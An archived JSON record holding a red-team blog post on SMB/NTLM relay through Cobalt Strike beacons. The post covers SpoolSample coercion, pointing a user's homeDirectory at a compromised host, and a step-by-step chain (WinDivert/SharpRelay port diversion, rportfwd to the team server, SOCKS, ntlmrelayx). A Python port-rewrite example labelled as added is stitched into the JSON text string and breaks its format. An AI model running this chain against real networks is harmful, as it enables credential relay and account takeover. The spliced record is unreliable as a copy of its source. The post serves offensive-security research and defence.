{
	"id": "0a4301b9-95b9-4119-a64e-77627f211f59",
	"created_at": "2026-04-06T00:20:16.594823Z",
	"updated_at": "2026-04-10T03:24:24.58267Z",
	"deleted_at": null,
	"sha1_hash": "14ba5ae43f1e5953309d6fe134aed75734091a05",
	"title": "Relay Attacks via Cobalt Strike Beacons",
	"llm_title": "",
	"authors": "pkb1s",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 231488,
	"plain_text": "Relay Attacks via Cobalt Strike Beacons\r\nBy pkb1s\r\nPublished: 2020-02-01 · Archived: 2026-04-02 10:48:37 UTC\r\nIntroduction\r\nBack in 2018, Will Schroeder, Lee Christensen and Matt Nelson shared their awesome research on Active Directory trusts at DerbyCon. In the last part of their presentation they showed how the Print Spooler service can be abused to force a computer to authenticate to another computer, and Lee released a tool, SpoolSample, that makes this easy. If you are not familiar with this attack I highly recommend reading the following blog posts:\r\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\r\nhttps://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/\r\nMost of the abuses I have seen so far combine SpoolSample with a compromised server that has Unconstrained Delegation enabled. The attacker forces a computer to authenticate back to that server using Kerberos, and because Unconstrained Delegation is enabled there, the victim also sends a forwardable copy of its TGT inside the AP-REQ that carries the service ticket. However, there is another way to compromise computers.\r\nIf we run SpoolSample with IP addresses as arguments instead of host names, no SPN can be matched for the target, so the victim computer does not attempt Kerberos and falls back to Net-NTLM. It has been known for many years that Net-NTLM authentication is vulnerable to relay attacks wherever the relay target does not require signing. 
This means that we can use SpoolSample to make a computer account authenticate back to a host we control and relay that authentication to another host.\r\nThe scenario where this is useful is the following:\r\nOK, let's put this attack aside for now; we will come back to it later.\r\nAnother scenario we find very often when reviewing AD environments is a user object that has rights such as GenericAll or GenericWrite on another user object, similar to the following:\r\nhttps://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/\r\nPage 1 of 6\n\nIf we have compromised Alice, we can do the following:\r\n- Use a targeted Kerberoasting attack against Bob by setting an SPN on his account and requesting a TGS for it\r\n- Force a password change for Bob\r\nHowever, both of these attacks have limitations. Targeted Kerberoasting only pays off if Bob has a weak password that we can crack. Changing Bob's password is something you probably do not want to do during a red team operation, to avoid disruption or raising suspicion.\r\nSo I started looking at the other attributes a user object has, and another option is to modify one of the following user attributes:\r\n- homeDirectory - Specifies the home directory of the account; it can be a UNC path.\r\n- profilePath - Specifies the path to the user's profile; it can also be a UNC path.\r\nBy modifying either of these attributes we can point it at a UNC path on a computer under our control. The next time the user logs on, his workstation connects to that path over SMB and authenticates as him, which is exactly what an SMB relay attack needs. Writing these attributes is covered by GenericWrite (and therefore GenericAll) on Bob's object, and unlike a password reset it does not lock the user out.\r\nSomething you might be wondering so far is this: you have been telling me these ways of exploiting AD objects based on ACL misconfigurations and SMB relay attacks, but you haven't told me how to perform a relay attack if all I have is a Cobalt Strike beacon.\r\nKeep reading and your question will be answered ;)\r\nRelay Attacks\r\nSo far I have mentioned relay attacks, and specifically SMB relays. This kind of attack has been known for many years. 
If you want to learn more about SMB relay you can read the following posts:\r\nhttps://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\r\nhttps://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/\r\nThe rest of this post assumes a basic understanding of relay attacks, so make sure you have read the posts above.\r\nOK, I understand how SMB relay attacks work. Now what?\r\nWhen I performed relay attacks in the past I was always doing an internal pentest and had physical access to the target network. But why not use these powerful attacks on a red team operation, where you have to do everything through a Cobalt Strike beacon?\r\nIt turns out there is a way to do this, and it has been possible for a few years thanks to the very cool divertTCPconn and hwfwbypass projects.\r\nDivertTCPconn is based on hwfwbypass and both are written in C++. They use the amazingly complicated WinDivert project written by Basil:\r\nhttps://github.com/basil00/Divert\r\nHow does it work?\r\nAccording to its description, WinDivert is a kernel driver that allows user-mode packet interception and modification. The user specifies a filter, and any packet that matches this filter is intercepted and can be modified:\r\nThe WinDivert.sys driver is installed below the Windows network stack. The following actions occur:\r\n(1) A new packet enters the network stack and is intercepted by WinDivert.sys\r\n(2a) If the packet matches the PROGRAM-defined filter, it is diverted. The PROGRAM can then read the packet using a call to WinDivertRecv().\r\n(2b) If the packet does not match the filter, the packet continues as normal.\r\n(3) PROGRAM either drops, modifies, or re-injects the packet. 
PROGRAM can re-inject the (modified) packet using a call to WinDivertSend().\r\nThe most important thing WinDivert lets us do is intercept traffic destined for a port that Windows already has open and steer it to another port: for each inbound packet we rewrite the TCP destination port, for each reply we rewrite the TCP source port back to the original value, recalculate the TCP checksum (the IP header is untouched, so its checksum stays valid) and re-inject the packet into the network stack. From the remote client's point of view nothing has changed.\r\nHow does this help us?\r\nOn Windows, port 445 is always listening by default; it is bound by the SMB server in the System process, so nothing we run from a beacon can listen on it directly. I won't go into detail about this because it is already analysed in the following post, so please go ahead and read it:\r\nhttps://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/\r\nThat post also contains another interesting idea: using WinDivert to perform an SMB relay attack via Metasploit. You upload a few DLLs and the driver file to the target host along with divertTCPconn.exe and execute them. I found this attack awesome, but what I didn't like was having to upload multiple DLLs to the target host.\r\nSo my goal was to do the same attack while dropping the minimum number of files on disk, and to execute it through Cobalt Strike.\r\nSMB Relay through Cobalt Strike\r\nFirst of all, I wanted to make use of Cobalt Strike's execute-assembly function, so I decided to write my code on the .NET Framework. My initial thought was to rewrite divertTCPconn in C# and everything would just work. It turned out to be very complicated. Fortunately, I found the following NuGet package by TechnikEmpire:\r\nhttps://github.com/TechnikEmpire/WinDivertSharp\r\nUsing WinDivertSharp, I was able to write a tool called SharpRelay that talks to the WinDivert driver and performs any packet modification I want. 
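The port rewrite described above, as an added example that is not SharpRelay's or WinDivert's code: a pure-Python model of what SharpRelay asks the driver to do, run on constructed IPv4/TCP packets. It keeps the ports from this post (445 diverted to 8445) and assumes made-up addresses 10.1.1.30 (victim) and 10.1.1.20 (the compromised host); a real implementation receives the bytes from WinDivertRecv() and hands the rewritten packet to WinDivertSend().

```python
import socket
import struct

# Added example (not SharpRelay or WinDivert code): the byte-level port
# rewrite that SharpRelay performs on packets handed to it by the driver.
# Ports follow the post; the IP addresses used below are made up.
LISTEN_PORT = 445    # already bound by the Windows SMB server
DIVERT_PORT = 8445   # port our rportfwd listener is bound to (assumed)


def ones_complement_sum(data):
    # RFC 1071 checksum over 16-bit words; an odd trailing byte is zero-padded.
    if len(data) % 2:
        data = data + bytes(1)
    total = sum(struct.unpack('!%dH' % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tcp_checksum(src_ip, dst_ip, segment):
    # The TCP checksum covers a pseudo-header (addresses, protocol, length)
    # plus the segment with its own checksum field (bytes 16-17) zeroed.
    pseudo = struct.pack('!4s4sBBH', src_ip, dst_ip, 0, socket.IPPROTO_TCP, len(segment))
    zeroed = segment[:16] + bytes(2) + segment[18:]
    return ones_complement_sum(pseudo + zeroed)


def build_packet(src, dst, sport, dport, payload=b''):
    # Constructed IPv4 + TCP SYN (no options) with valid checksums, i.e. what
    # the victim's first packet towards port 445 looks like on the wire.
    src_ip, dst_ip = socket.inet_aton(src), socket.inet_aton(dst)
    ip_hdr = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 40 + len(payload), 0x1234,
                         0x4000, 64, socket.IPPROTO_TCP, 0, src_ip, dst_ip)
    ip_hdr = ip_hdr[:10] + struct.pack('!H', ones_complement_sum(ip_hdr)) + ip_hdr[12:]
    seg = struct.pack('!HHIIBBHHH', sport, dport, 1, 0, 5 << 4, 0x02, 65535, 0, 0) + payload
    seg = seg[:16] + struct.pack('!H', tcp_checksum(src_ip, dst_ip, seg)) + seg[18:]
    return ip_hdr + seg


def tcp_ports(packet):
    ihl = (packet[0] & 0x0F) * 4          # IP header length in bytes
    return struct.unpack('!HH', packet[ihl:ihl + 4])


def checksum_ok(packet):
    ihl = (packet[0] & 0x0F) * 4
    seg = packet[ihl:]
    expected = tcp_checksum(packet[12:16], packet[16:20], seg)
    return struct.unpack('!H', seg[16:18])[0] == expected


def redirect(packet, inbound):
    # Inbound packets aimed at 445 are steered to the diverted port; replies
    # leaving from the diverted port get 445 put back as their source port so
    # the remote client never notices. Anything else is returned unchanged,
    # just as WinDivert passes a packet that does not match the filter.
    ihl = (packet[0] & 0x0F) * 4
    sport, dport = tcp_ports(packet)
    if inbound and dport == LISTEN_PORT:
        dport = DIVERT_PORT
    elif not inbound and sport == DIVERT_PORT:
        sport = LISTEN_PORT
    else:
        return packet
    seg = struct.pack('!HH', sport, dport) + packet[ihl + 4:]
    seg = seg[:16] + struct.pack('!H', tcp_checksum(packet[12:16], packet[16:20], seg)) + seg[18:]
    return packet[:ihl] + seg


if __name__ == '__main__':
    syn = build_packet('10.1.1.30', '10.1.1.20', 50000, 445)
    diverted = redirect(syn, inbound=True)
    reply = build_packet('10.1.1.20', '10.1.1.30', 8445, 50000)
    print('inbound ', tcp_ports(syn), '->', tcp_ports(diverted), checksum_ok(diverted))
    print('outbound', tcp_ports(reply), '->', tcp_ports(redirect(reply, inbound=False)))
```

The inbound flag stands in for the direction WinDivert reports with each packet; the filter the driver would be opened with to see only these packets is roughly `inbound and tcp.DstPort == 445 or outbound and tcp.SrcPort == 8445` (assumed from the WinDivert filter language; check its reference). Only the TCP checksum is recomputed because the IP header is never modified.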
The only requirement for this attack to work is a beacon with local administrator privileges, or at least the ability to load a driver (SeLoadDriverPrivilege), since the WinDivert driver has to be loaded. The attack using SharpRelay works as follows:\r\n1. Upload the signed WinDivert driver to any folder on the compromised host.\r\n2. Run SharpRelay to rewrite the destination port of incoming packets for port 445 and redirect them to another port (e.g. 8445).\r\n3. From our beacon, run Cobalt Strike's rportfwd command to forward port 8445 of the compromised host to our team server's port 445 (rportfwd 8445 <team server> 445).\r\n4. Start a SOCKS server (socks <port>) so the relayed traffic can be sent back into the victim network.\r\n5. Run Impacket's ntlmrelayx through proxychains to do the SMB relay against the chosen target.\r\n6. When a victim connects to port 445 of the compromised host, the NTLM authentication is forwarded to our team server and relayed to another machine.\r\nThe usual relay constraints still apply: the relay target must not require SMB signing, and the authentication cannot be relayed back to the host it originated from.\r\nThe code of SharpRelay can be found here:\r\nhttps://github.com/pkb1s/SharpRelay\r\nAlso, a big part of the code I used for the packet interception was taken from this project by TechnikEmpire:\r\nhttps://github.com/TechnikEmpire/CitadelCore\r\nShow me a video or it didn't happen\r\nTo demonstrate the attacks I described at the beginning of the post, I made the following videos.\r\nSpoolSample to SMB Relay\r\nAs mentioned earlier, we have the following scenario:\r\nThe following video demonstrates how we can use SpoolSample to compromise a computer object via an SMB relay attack:\r\n(video, 1:22)\r\nAbusing weak ACLs on a User Object\r\nAs shown earlier, the scenario we are going to abuse is the following:\r\nHaving a local administrator beacon running as Alice, we modify Bob's homeDirectory attribute and point it at the workstation where our beacon is running (10.1.1.20). 
The next time Bob logs on to his workstation, it tries to connect to that home directory share, authenticating to the compromised host as Bob, and we perform our SMB relay attack:\r\n(video, 1:38)\r\nSource: https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/"
	],
	"report_names": [
		"Relay-attacks-via-Cobalt-Strike-beacons"
	],
	"threat_actors": [],
	"ts_created_at": 1775434816,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/14ba5ae43f1e5953309d6fe134aed75734091a05.pdf",
		"text": "https://archive.orkl.eu/14ba5ae43f1e5953309d6fe134aed75734091a05.txt",
		"img": "https://archive.orkl.eu/14ba5ae43f1e5953309d6fe134aed75734091a05.jpg"
	}
}